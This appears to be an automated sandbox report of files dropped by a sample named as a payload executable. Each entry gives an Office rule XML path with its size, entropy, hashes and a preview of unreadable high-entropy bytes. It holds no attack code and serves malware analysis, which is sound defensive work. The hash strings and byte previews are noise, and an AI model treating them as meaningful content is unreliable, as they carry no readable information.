                                                                                                                          MD5:9D03F91D3CB2E4CB68DD193050D96331
                                                                                                                          SHA1:884CE34D1E8E4A5160472BC6B4E8E5C7B3B1E4F7
                                                                                                                          SHA-256:5BDDA408670B0844DC7A1B2F643CC3F097DB0D644530E802322FED7DFEB20C6B
                                                                                                                          SHA-512:2AEC80EF09080B845E27B294028132872C53DFDFAFE4682C69962808B2C92C4F127207A707910C2681BA592BD6915F6F326BE38B0ACA33311B90B60FC18AD7DD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlT..`&`Q.*..H..z........I.6.?.ck.E.x63..+j.[,=.#....v..Y...|ei.....A.H:N%&l.8.0.{)g..rw..9..oCsk......3.6....s.r.5...p.....g..d}W/u.V.A.E/...^=...V.R./.6..\...[....kQi......E$lH.....0.O.51.+...F.Q...C=.........w(zGi......VD...y....Gl7|w.}..s.U.@...<.>]t.!AX......VE..#h...76<.K>Z.o.z...F1.'.S.\$zF...J..$.ZQ.;..=u6)L..J..B.....V..M..N..%. .]3&B.0.O.-.(.....33...FX.I.p..b..1n...f....?P..bX" t...|d...ku..[X.x.W..=.....,.8....N@.........5...M.z...(c.d.FX..EZT.....^.#..T..).5.")).!...S.x...-sI.B.iI..?>..............C0;....\.7D..[...r.ZY..b..wX....JL....F.M..c...~..7T.!a1.Y..QJ.L..Vk.-.......Sp..O...S.|.Vn..I......^[..c.....9.I..#...m....8.Xt......T|.#./..........1S.b2,:...PN..|.!S...q....eZ....{..N.#bs...2...=....[.N.`g...aJ..\..7gsG....W..=.....}$...3J.:_{.......-..g........H......(j........ [].OD.Y5.\.....W.....o..M.....,...S..A..IH97..O...J...MD...)V.......8.. ..xJ.f..=..S#-.S.%..4\..K..5.....}...\.w.:....Ic........1.....@.P.....2..0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724
                                                                                                                          Entropy (8bit):7.881603069618026
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6lfsf3DT4zsQi10rDjDunMhewH4bfSfuBFowuJ9D:mUfzEzxEuGnSHqSfuBFQT
                                                                                                                          MD5:134A06D13E2CFB9E4D08FE3058CD48A8
                                                                                                                          SHA1:7E5DC79C016D6A86A3758A1D14FE50E102C0D9AF
                                                                                                                          SHA-256:AF674BAA87B655ACC406A487A0F16AEF6A43DBD9228E67F3CB18C44609A89A39
                                                                                                                          SHA-512:A15D83B2FEA8A154EB5723EE893B7E2FAC25413768F8BA5802075F9817F75BBA3DCF2BAED01B948292943DAB5C949F9FF4AC9B249AA5664841767E8B74E95B7B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.@..zls*........j%-W.....xc]vS..<.QB...[.y(!.+NF.S.....?TbP...%.....ZQ:2K..52..$..^hx.R.5..$..iP.hG.$...}.....&..(............b..|.].z...O)r..A.%.PS.........'5i.-Z....^.H.>@.1....oT..<.a...u.........}.'.../.....d.Y..P...%..r[....6T>.L|"..br+1_....;LT.9.....@.D.u.O...}.........N..#.N./%W._Q..|.y.T.>Y....H.....%...z}F.F.........&.j;=..o..~....F.".....LI\..}....4Y..T.._#(X.[.'....;.....n.....r...G....on.+....%..F..B.{<.b.xFPa;X..O..=...`.7....'..T....e..Sx.._.q@...g.......Fw..r..N.,.1....._.-.9.wr8.W..~.K..Z>...|........o"....+..@.E=..9\..y.4...r5.*...........x.......bY..sJ...Z..OF.T.:....C@.V..<.$w0..,...s[...IT..X6.90..1..XC..9...\.c..Q...#e.N2i....Z...S..l..5......(.Q[...L..:..`$:!....].T...g...~...6...w...=..bV=...%."CN."...<..i....."....C....z.*.6.C.j......L..5.]*...~%...s......~\?....'..*...`......S~1.A......f=.....xK..............dr....4X....z{..b...bL....wx.P..x$@^..,9....a......kN<.iNj.Tq..kR.1......Fz*....pL..BW.a.N..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1761
                                                                                                                          Entropy (8bit):7.9006711245305725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:eQRkFFQGJlH9sxmnALTkhRYteZR9ORNC80GD:edFVALYhRYteZRw7ce
                                                                                                                          MD5:54EC91B1AAB5A3187E5A63B6DD7077AD
                                                                                                                          SHA1:6737033A86350B754B9F2BA9873BB2A091F5005F
                                                                                                                          SHA-256:5449A2B3ECDA7D09E36D8A5FA8A435B8C51BCB4FE2228159368B52FEF2C6BB2A
                                                                                                                          SHA-512:DDDD9592281FEADFD6F66F0C014349DB49E5374AE1F1ED2E15EEA5E24B03F624209CEF27ACEECB7485C087FA108B130B3FAB52C5DD419C846079972C92678263
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlT .....E..,..Z.....3..|.A-9&...oG..$r.^.Fc..`.f.9....".J/3;bh.-.@......p<.....s.W...`). ....Y0..\.[.TteL.PC6./............wi...&...S...GU*|..@.^.......q.X...6...4...A..Y.T ...o.f..q9f.........4Q.....K..v..7.(.m.H.l.=wns&.L...........e7.G...S.+z.P..q...D..z..B.5.?....].9.B.#..G7j.........8..#.Z.sS4....#.K.....p=Z.K......$.D.R%}<6_:.%...S.Q..uV....L.......).60X..p5..Dr..(..w.s..r...sl.....`.>.O.......8M:.........){..O..."...6..v....U...^-N...H@..E...........+K..$...eY..`qd...D.....u9.........63..uY......+.$.ie[....A..F#I..-.5}.(.]%.aP8'.Cm.2E....A.......r.$w-.3G#..esl.As. {..F.G..9.e...8.i.}]N%.2..}{.H......h.........b....\..i<.a7.......$....p..D...U.'.b7G.Y...b..@...s.q.....V.4..nri.|.......'..UxNf.2.X.K/.vf(*..,.q0.......Ja....{~.\...8n.V...0e.....^..(...{)PH~E?C.}.f/g..~.7z$_....p"q..l...[f..K ......|......jA.e....%....h....o.As.l.188AE..-/u....mk.?.-i...w...G..@.>z....YmA,.RiA..qr..Y....Q...9..'>..........~..S...v~......vA.....W......c.l1..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1689
                                                                                                                          Entropy (8bit):7.881571972778991
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QYr03phbw7t0c3OkjxTZtrdA6bobECTYY6EUOfkevWVvD:Qw03vUOc3TxTZtdA6soCTYY6EIevy7
                                                                                                                          MD5:CE6BF2C526EF685A4E87A8842F0C20EE
                                                                                                                          SHA1:4D0ED5FA8CF32F437E1CAB35236F7810AE6E672B
                                                                                                                          SHA-256:4133C8AF1B9025699FDAEAA4D8D66FBCA0FF5401D0B22094391F2685DCB5AD72
                                                                                                                          SHA-512:9C9C8078E2A3922593C0805CF390A746287BB3095CC55F1927EF3C4168273383B998BEB68EBF5F57139716F95ADE0A0E6FAB7DB1AE9959058F46B080866A01C5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...S.-.9...PU...d.p/"....'26N.%.w...s._.......C.*2]9d...Fh..f~Y..U.S!!...n......j>..!.|..:w....3.7tg...oM.7...\[Gr..H...P.>-L...L...d.Eq0]./...z..((E.E..E....qs.....!..R....[.[|..oz.B..'.X.... .a.#E.J...@ig..7B*.`....9.."X.w...q-...w..p\.#X.2...Hp.'.G..<_. ..(G..6+..X;..../,.M..\u9.8..H.y.zy._T..l...&..[.2a$./YK..3.H.p:_L.d?....;.x.K./...G..1..z......./....x.....9;.|....?......m.Pz!.B?dK;E].......fK(Q.V'X/../e.P.....u....]!..h~.../..7...{;X.T*...$...t\.l`..U...e.@..:...r....&\.pK.!..t...=q.?.}hn.N.g..v....D..:.....teo..F.E.R.x..cKl.Zn...%.8..q..B}.>.....C.B.4...^/..T.....I..wr.3.......g.].....c#*.F...h.,..w.........q..?...5zWM............=.=K~7...c..[.o<Z.?Z..g..EeK.q...fd.n.:.").a..._6.4.D..OiD^.La....*.RQ...G.`...6.}q.X..Vc.+g.|0r..d..)V.[...Ty...U.Bf...5...6.c...b.q.q..........Z.L..X..aV.%.mU...>.a.y...1X*.*T...p..8..)U.x@...q....n....[.&M...S.75.![..M...=...\.f..H.Qv...g....4;..,f..<......~.?..Y..4.}.,.H2.....y...+&7.9.....{o'.~...)...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.886120116481954
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SxZCxac6Jy3klotLoj12RYXTTFfA84bL3CHfp5NZn3xsJ7/Tne+k4TcERceLJI6V:Suxac6gcQRYjTFB4bLSx5Y7rfTzc0IsD
                                                                                                                          MD5:8549813D6EF16B46CFC2931C8F7A318F
                                                                                                                          SHA1:1A19845236AB1A7238A16D0AE0422EAC1144FDA2
                                                                                                                          SHA-256:4E929E59B76A7F750EB9210296070E9FE34618B4BE43D0C1BE7237F99BB4A4D0
                                                                                                                          SHA-512:00EFCA1FD62744EF1542F2844BE481B2BF308A1AC1B514B25B98D18B9DB5C3AAA1437B91581475C4A631039380CFB63187E39965367F38728C757DF0A1A3ABC4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..._Q..jpC.m.m..,.:..K.....P........J.ML.._...E1.{..8c...Hj4 .@|CA.b...._.fe!...%Z.".hP..1...{.ie......e.Ma.A...av\..<J}......"...<o._.NI..)..S...(.8.._V..6kH.8.aR.u...3.....j.f...w.W.e'.O."...Ko. ......V~..n.+.O...L...~..p.H...W.~..P.2....]A..f.h.&...H.'..Q.I+.>;.%........S.i~.Tm....v......A.=$..o.;b.....^P....L..?q>..I......<.Ah..%T4|...m.......NW.....E....W.~......T#..K.........*(.".0.|....j..H..t..[J"...'$..O......._R..oS3|.....C...TL.Y...n{. .q.K.I.*..q.H{...dD?w.....qN...;.-F....,...*.f./g.*.K...tX.. .x.$........v.dk$.,.p..X"sk.l%3.T..?......h+o........U4]....6.k....xS.1_....m.&......0P..n..Y82.~. .......X.b.........(o.M..G.g..L..HX.l.b....S...|....Ye...i...M.M...S.../.jdk.F(......ER`.]F...}G.._......sP.....kI>\#D.^.x6.uh.m.i_.\[l.8..O.C."..0.b....1<.......\........L..gf......y.p..'.t.|....x.._..Mo..X..Q.9.^h.'...{..B.H<u..X|...k.b.FW....CA.......n............6..u.../.v....a<1U..n8=..=Y.X..w.L(J..H....|..._D4,...KSZ.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1707
                                                                                                                          Entropy (8bit):7.87002787533466
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:eo0JXEaIk8FHMgd+IZoWwF9bbXDgtDq641KlP2mmm6kRoSmph/VVEYTVhwDrQoge:cJUanaR+yo99nTx64e2PvSwlVurHQYhD
                                                                                                                          MD5:863F7884167F6ADABF07DCA2531FE752
                                                                                                                          SHA1:136864543E5E8F1E7E456BB34E65AD697AD42CAF
                                                                                                                          SHA-256:B68D507E6ED5E3F0BFDC0AC8103CE3C0546C9F176717CD76AE6A5F24B6B8F8DF
                                                                                                                          SHA-512:4FACB2EC99F52D561F69DEA0B0ED971D41D9EBAC2B3E2AD88EF0972F09D03D10E071E2E035C050EA1B61C3161B36E6D02EC142308DD6C70E736B62BACDEF01E9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..J..../..R .X.c.y;.7R.._.(..(..u?.>f_.1C.V2.4.3Ycv>...bDcD.r.h.lJ......eo<X.Ol.-.G.....<k.K.W<..t.c.T.|K9...!.9..Z.x......|...X.J:..zb....`^@..D._.w.....W..X....S..^..<.AMg..m.X.t...@..O....t.$.k8..5.M.uMd.I..n.g.*ap=....F.pK?..|$4....;..Z...,..._.UnM^..U./.K.>.;.3...Z..Fa.h.o.).....2N...N..E... .HA.Z...,..h..p.f6:p1].....1.k.$i.u....V'.......m.Dak.d..1....ACp.-.A.Q..K.......L..Ou\z......[...v/zY..x...s..a|.H..U{i\....?.3.D^...-.>G..x-"..n4ko...k.@.;.I.R3.R.UN..[ym.H;V.Z...6..(t..... .u;'$....r^.i...G}...{S....2D6\...B<...)..x.hH;..~.Y?y...3..(*7........h....XR.O.weX... .[Q].H.]..A.3.N.~3D.>.-.6.|..'.I.D*..I.e}.....f<9M..N..._v..I..9k.y...;..GQ...h....s1Hx...w..2%....fm....r.U..^},.L.$C....u....k......F...Zv/>`....3..'D..../hc.p..%t...........V....S.*d].ju..Te.&MF..iI.O...-...=`.Rs.;..........Z.X...(9..|. ...%.DF...R...29....k......9..a.......[...].5....\....}....=..Lk[ .DU.^H.`.......-........1+.Q...x..`..U.6.P...6r.....q.\....X.w0h.y.%...6B.~

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1744
                                                                                                                          Entropy (8bit):7.894879380266611
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:reMLPvmia3R5rMxy2oOTaLykGMKP0Q6mDUZmNZT0lqrV5D:rvDHSR5oLSO3P0WHNi0rVx
                                                                                                                          MD5:CFB5B213BB1702E8219D7988B100E567
                                                                                                                          SHA1:A8A141614C19A077B5D51C28AFB66463CB57FD55
                                                                                                                          SHA-256:2CC802DAF06A428B976E43E5ED4762266716E62D0FB7F936801C0FDE3F44D761
                                                                                                                          SHA-512:577F6D33456B2A99A2891B81CD750618E2AB99C54307DF4C75A112F352732D5709B5B57D9B22ADFCB6A4620D038E8A1CCECB9D0C27A2641D1E612CE147264CE1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlJ.A2.Z.7....c.........'.;.[qK.".^.....<O.YT.%.%.`{o.....K....9.&0"........s..iE.t%.(.A.W.;[!m.......5..:.q.N(1U.....f.h.KeIe$B.^>.3.=.........y......B....&.=.A.^....ZQ ..A:..1....d.GTy...i.6...5...L.#6}.z.$D0@~[..[.U}3.*..U.....%I>..C..7..2.eu....}.^..=.q(5....J.d.?..l......{5.K.1H...<..T.!s... 3.kP-j$.o..Lc@..K.-.....j.....i.!pXz.....{.:q[........7.a...G$...U%.GD.):.(..........A....i...H'...0._.+..y.. c.XY.HL.......t25..9..L~6....9`..h...c.y..WEm...0&......TJ\...JT.F...Y..wM...D@.(....W..&..9)...n.S1...{.&]..".U..*.....i.... S.e.;.=........k2...............di...v.&...(._..8Bj.."3..x..../..K.=..?..J...S/X..N.s.R....|\K.S.S....^....".....e........[....9...'.b....".4......H...t..ysiX}.......4*..f+.].R...w>E3...4.o5....6......*..~.wP...q......../...T.!.."2..&G.......5.h@.....f0`.5...9.=.F..i..v..EwQ;#.......k..,QD......._....._"....qV...c......,....b.....1..g}.<c...Y.....z.......5.H....0..Z..HI..'....HO....|.P!a.$...*...........>..r.x'

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.884027757160489
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:i2+BX2bhxYnTnYJAb3ZOdhAZZOsb3JyLVD:i+Xi0JwgnAPOs4Lt
                                                                                                                          MD5:94D672B9C3C851F9B9E7F06EA684BAB3
                                                                                                                          SHA1:BA33D4654C4C2A9815B6EDE00B080EEE5FABDD12
                                                                                                                          SHA-256:6BD58FA7C192C7D1A7E4F662AE2E8FE51D4B57CAA9B86D29E575294E96CE1F70
                                                                                                                          SHA-512:941BA69027F0555F5C6EF57D20EE5C60F24BEA55D88D0191CA1B27A7A09BFD8160BF171046303121AE98005A24F5F4E10C8EDA8D310F2775CC9D3B211A34F26B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml@.k."..a.#.^.f.2K\....R.....]... '..Ygu..#.=.O`g..3.~i.K....^P.Z7.#..O.....H....Fv.i=. .d>o_...?W...Y...-..J..........xZ.'.. .%..4.........T.].9K..w......".u..5.....}a.......3...61.....*........8.%.'7t.c2.:.b.......t......E.....0....+..H..Z.?;...>.-..-J.+7..R..y..O..x..O.B..$...4Q.....-n.....%....w..T...].._.PD.qR>k..{...<.H..'.w.r.'$.W.g*...6\P...*-..V%...-.#..@>0%}.:.Z..Y.Iu)... ...J.T.M.;..~k.P./......'\..M...\.Pd.6..Q"...e...X..\...%kMkHC5...q...D._.C.N0.4v... ........k....a |.'/.."...=T...........W...[....!...1.Tme.iY.U.h..ES)...j...1.0c...h...g._.K...Z-..2."...0.Gx..S.[V4.,..p..z...9.....y....w.....,t...U1..r..5A.XuoI..F..>Z.!....d..[R....Q..`....TM.....&r....U.".B.t...`...9...n(..g"....e...z..g%..W>...X.._.B2....([..>5....?.'.[..R..~}/.>.Jb."....."....@. "..2vB%.....<A.wj......xn@....j........?2Se.m.w.V.w).p.;3..sUY..qX.w..xd..#V..{....9...0.8(...m}..EdFx.@.r..;..e_w..~...}.B".^..G8K.....w.]...<H..m*.+....|.h......q.x....HVdSn.A..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.896558205094418
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:EK0czyhlKgCbw2xmuhmjrSh/wrg6UtCDMWB38D:EK0zlcSuhmjrcwJCCnI
                                                                                                                          MD5:D3AED79FF19962DA37D775BCFCB54FFD
                                                                                                                          SHA1:FD4B49876FE2CF999FA4EEDCE18D1D091FFEC72E
                                                                                                                          SHA-256:B61735DEB3314162D343978630A88FD57771E0B77F75287EB5EAC9709DBDC2E8
                                                                                                                          SHA-512:1BFCCA2A0D39C85AAE06EF175C269123DB424162B4473FA3A14313156D5B95D68610FD011DB01E1099E2A2A3FDDF3B04A2BBE6A8907A527C6489EAE2624898B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....6.......g.J.8s......\t=.[4e.K..V.Y.....j`r..0..{.F..,..G.JAb..j.!.C.5.,..W.t...^o....6.c..\Tt.r!?..}.~.|<l./...z*X"...."..]pb....!.N{.A..?.....@yx.~i2.e.G......O.._~...?.S.....T.....=.Rr.Y.H...7..f...%..1X"Z...>....h24..Oh.u)>....D..1..JU.T.~<.w...*.#e|P<.....q..+ho.k...u.n.n.....2......Z.IplY...Zb...=.#.....}..."fq..; $._......[.c..:.....<n.._.H#.....G.J.p.'...!i.6.:.$qT...+.$.-;,..n(..qDd..f.w..U.5.....6..+.<g..{....G.B.C.@..i..........O.....#.......2..m...F.....fq.'du%@..#i..C..........j......T7`u.x..S..%.c..A...^.x..N.a...Y0..4...\....s...k%=...{...f...rO.../.8k.}.g..Nd..q........9..j.\m..QG:+..E.k...(.Cz).?hD.5.)......!.....b.}j..sE.uA-.Q....e%....q.UMj.n!uH.2.X..@O.G... XS..M..;1..ETz.......S...&..j....D.~q.:...n.#.&...b....a...Z...wX.;.......%pFx.t...I...A0.....v...7.$.M.Kl..O+....@.b....T;....L.="l`;~iXuR.e.b.t...x..od_..%...b..J..1.R...y....8..f.f#+.yV2j...B....HO.Y...h.....@YC.&`.vmJS..=..g....^k.o..x.<.m...-.P.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.89915824183512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:W/59hHgh2Q/fg5wGDImgPVBw175q4G1WzFVWaOgcQa97afoQpTxXu3YU/PAoTwRe:W/DhH8MxoPI1FhGIzk9koQnwYUQo/0ED
                                                                                                                          MD5:2796C51E0B6E4253894EB0E52BD9D56D
                                                                                                                          SHA1:F71C13C86519E0B2EAB4DF63DC3FBDA689DC9676
                                                                                                                          SHA-256:F534CB73E24C3E0F737FBD085F6AB7D1B18CDB81028B2664C3A86C22CD22D008
                                                                                                                          SHA-512:D0FC4B59C622A08FC06BC75DD880F484BFEE1E5755B0644BB10C457EFF5A2DD2E2A52C7B77C1AF999B88C82DEABA0DA271798296268BB9369E8766329944D94F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml../..<.+...f.9Kr....<:.C.s..2..>.H....rd.%..?|..]pJ<.._...e..<..0*%.....Q.Oe"..b....j...(.....+...-...@....D.1.K..E..*F..s/8...A.|.l.(.t.s..>>.!.O....*.)........w..d.$..`...........;.......U.'"t.K.H........e8.O.....E^..'.c.:.cf..O-..u..b..J..n...P..1.......;.....i7..]...-.g..y.t....@...l3.;4Sfz.3..(P8v.tr.b...3...d.KP2ULN5..$..H.KP.i.<.g...`...l......5.#.L..gz.u0.I...].4O... ...|e... ....7.?..D.,.....E.0.t.%^.]..'.;hy...Z../Zg...9@..Q.W:.Y..u.T?J.S.!...r[...i.7l...\..z...w.....A...A.>.z.k...V.l$......2G...HS....V.1~...f(..i.[..mSg..H....LB....(......W.Jq.Uj~K.\m.g.;.<V...r...2.f.xo..].....6......J.......CN.W6.W....@.,.x....t..'...w..t..Bc.C.,.E...q.4.%.........*......^.....{#.OD.O...[t@!.9...5..e...'....z..9..a.dIi ...8..FS..."b.!w........tN...,.. .]XkS..5@.........6?...!...:?......or_...L.f..x+.(.W...t.f8..O.e...c....X......b..\T...i.........AQ.c....3..eo.o...0.........?L...T.l5.ji.......z,..l`.KV.Zf.U.y.5...6,

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.869815557975266
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0GZUP31jjP/dxpI98DflgEdOPm7nww5qb6jKD:0Fv1jhcSaEUPm7wNO+
                                                                                                                          MD5:FD1CC8EB8A28989038DA6D87EF1CDC70
                                                                                                                          SHA1:D05F45663EB73589C06728AEAC2CDAF24D1AFF4F
                                                                                                                          SHA-256:8AFD3D870C57ADCEF3AE58F6352C6EB7DDEDB1ED70DD65BF849D21CECE94A203
                                                                                                                          SHA-512:5133C7C883DD08F7E1E60A259BDAC8F21C707F0C65920548CB79DD48966CBDC6F25D5151985A02AD0A6B7DE514AD6D7978A7AA3E5D620A5C44B1F8BF1D6E9613
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.2gJr..3....JZ.v.t$...A.KS...W.M.l.a.$P.0.;..n2.E...\.&..(KA.~<._Sy...6N8...!...2....q.B.*...R..)...{m...!*?....,9p.I8.Z_....8k...$\..$.7..H..[..#....[.)_5.3...U|w.*q....'....LVe.l.>.l...e.t>$..&CY.I..73..o.......kl.....1.7.P.....W......[.m..._HjS...C...\.7OEY..?......v.8.*s...J...\K...[|R...hg.p.1..p..6W.|....<..>.......E<J@Cs../...RY..|.(..]..4....................`>.V...li..#jB..7...\?.......|9.x.3.%tc.F..x..."....sWk6b!..bO..j..l...+Gz...J.^~........'.PJ...x.sU&.6.r5f8.j.<....L.+.?.L.|..BM.C.........xD../.zb..5.2._...>c...;;.....].X..H.5$.............[...:..$...I$r.....#...&.6j.w.z@s...;_t.W.....D&..>..._.....p.t=..b.+..KQ.Y".l..t..M......NM.M.g...s.k.2.)C...30.)...;..<5...{..J\+..do....^h..t..].....X/E..J..i.&A..":t...m...#,6....9.G...3.O...=n.eTq...~..g..L.d..........^-.'mY.>......`....Y.a....H=..y.Y.G.*0+|.%..)`...k.jd.:.F..~...rK.L...!."B,.3W.....,..,.m..O.q.X....s*...n0.,U.-....6.'........Xq....7...vlFNtNC..w=.^....z..'Ar..h..>.6.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1715
                                                                                                                          Entropy (8bit):7.858227610589219
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:eTeFJ98dSeqpoUkKKj05SF1CsyLGITgJJJNeESebARLOCo/Gb9dTsGjPrs5Qljdp:eTeyDUkD5iGIUJ5bSebA4CoKnsGjGibD
                                                                                                                          MD5:9EB1CB0712472D807CBCF52B7B86F6ED
                                                                                                                          SHA1:47FF9D764807866831A6E9BAEE0108F8FF735879
                                                                                                                          SHA-256:FA363B7D2E47C05242CAA6849C904253AAEC079D88BFE91176F0FDB2E4D27FD6
                                                                                                                          SHA-512:6B339F6C18B308C3659BEC94E17276CE4E1695B8DDBE2DD242BE9C04D3B49AB2309AB3629F88DA7602CCE3E0CDEB056E5281698746B975FD0192A2575838A237
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...Q6+..|...]}....Q.{.....n.l.d4$....9.-{1...Md*X.F]...o.1.?..&.. ....W-.Ld..@.....C.=..d........y.(..{.......'.?..=...X..{'.F..I....h.....m........{+b......"..h....|..d..K...y..JW.y...+......1...U|.B......6F.N"a.(.%.@r..v.s...p.o.eu..*....*.c/C.i4.{...I.kn....#Z.......D.D.T.....p..3e...KM..=.....6..T...b...V.V.mL.>\... .P.V..b.u.......'..xX..w&....(.j.5..01&np.v...1?....ww:.~'.w..,.?.x..Y....P...>v.....V.T............_..ZnYM8+...hS.]..i.e....$.......k..H..y..........+{...+.47U..d.-y.X.....+.w]+m..._j._..S....|5|..T..e.K:.....RJ"...JG.....aH?+..B...n............PP"CF...V.y)u..,&..M.u.F....xEi;..@.z-..........].....U.M.._..X.n5k(..A.^....7...E=...-E.......X:<b....7...&{.F..|3....>..,.k......3.j.~.zh.uxf.....<.9.].`.WW].}..p.|.<.M.2Z..g.k}..f.9.w-[.+.s0.P1..<w).F..>U=.V......].........'..H8..'|...Q3q.T....x....4...a......7..Uq..+....Gk...8;x.%...o....c>.....cX^`....w+..o..W.*%...(c.8...[.F..gW.`.J..}r......8wc..#<.....M.N..r.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1752
                                                                                                                          Entropy (8bit):7.883567741923408
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:k0Sa02w/OpkP0K0VkaXzvqQjFAb46QLQCGpgv85e92KDlADg8eg3MVJPXrGlTSeA:bSOpRBfJAbSEZlKDl18pMbfrGhUD
                                                                                                                          MD5:F97DA43EFB18C28CFCF54AE0808977F1
                                                                                                                          SHA1:3F4941AACD681B3B77064E24B86BCB03F6DF5C2B
                                                                                                                          SHA-256:5209F362461E8634E9FDE0AA7239AB2E8A8E59E77C7D092A1280FEB5EFFB00B8
                                                                                                                          SHA-512:EA59466B2B5468A92B7F18F8A01A42DD2E849188F84FD1001F40157E1E73B767E1960B5D4B187478A1F45207F058E0EE137A3B2F62E5188C8CC84C8074318078
                                                                                                                          Malicious:false
